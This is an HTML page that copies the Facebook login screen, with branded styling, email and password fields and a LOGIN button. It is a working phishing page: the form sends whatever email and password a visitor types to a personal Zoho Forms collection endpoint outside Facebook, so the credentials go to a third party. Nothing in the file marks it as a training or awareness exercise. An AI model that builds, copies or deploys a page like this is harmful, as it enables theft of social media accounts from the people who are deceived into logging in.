<!DOCTYPE html>
<html lang="en">
<head>
    <style>
        .fb{
            width: 360px;
            border: 0px solid lightgray;
            margin-left: 950px;
            margin-top: 150px;
            box-shadow: 5px;
        }
        form{
            padding: 25px;
            background-color: #fff;
            border-radius: 10px;
            
        }
        input{
            width: 300px;
            margin-top: 25px;
            padding: 10px;
            margin-left: -8px;
            border-radius: 3px;
            border:1px solid lightgray;
            box-shadow: none;
        }
        body{
            background: #f0f1f5;
            color:#0866ff
        }
        .log{
            background-color: #0866ff;
            padding: 12px;   
            color: white;
            font-weight: bold;   
            width: 320px;
            margin-top: 25px;  
            border-radius: 10px;
            border: none;
            margin-left: -5px;
        
        }
        .new{
            margin-top: 25px;
            background-color: #42b72a;
            width: 250px;
            padding: 15px;
            color: white;
            margin-left: 25px;
            border-radius: 10px;
            border: none;
            
        }
        .head{
            color: blue;
            margin-top: -320px;
            margin-left: 300px;
            font-size:xx-large;
            font-family: Verdana;

        }
        .para{
            color: black;
            font-size:x-large;
            font-family: bold;
            
        }
        input:focus-visible{
            outline: 2px solid rgb(12, 14, 14);
        }
        .leg{
            border-bottom: none;
            border-left: none;
            border-right: none;
        }
        .sub-btn{
            margin-left: 0px;
            width: 300px;
            background-color: #0866ff;
            /* height: 15px; */
            padding: 12px;
            border-radius: 25px;
            color: white;
            font-weight: bold;
        }
        
    </style>
    <title>Facebook</title>
</head>
<body>
   <div class="fb">
    <!-- Change or deletion of the name attributes in the input tag will lead to empty values on record submission-->
<form
action='https://forms.zohopublic.in/luckynani1822/form/facebook/formperma/HjJAntgIhJCLCtbyy6v-tErdtIjzBhq1BTf8o_9eNB4/htmlRecords/submit'
name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
<input type="hidden" name="zf_referrer_name"
    value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
<input type="hidden" name="zf_redirect_url"
    value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
<input type="hidden" name="zc_gad"
    value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->
<h2 align="center">facebook</h2>
<p></p>
<!--Email-->

<input type="text" maxlength="255" name="Email" value="" fieldType=9 placeholder="Enter your Email" /><br>
<!--Single Line-->

<input type="password" name="SingleLine" value="" fieldType=1 maxlength="255" placeholder="Password" /><br><br>
<button class="sub-btn" type="submit"><em>LOGIN</em></button><br><br>
<fieldset class="leg" >
    <legend align="center">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OR&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</legend>
</fieldset>
<button class="new">Create new Accout</button>


</form>
    

   </div>
   <div class="head">
    <h1 class="head1">facebook</h1>
    <p class="para">Connect with friends and the world around you on facebook</p>
   </div> 
    
</body>
</html>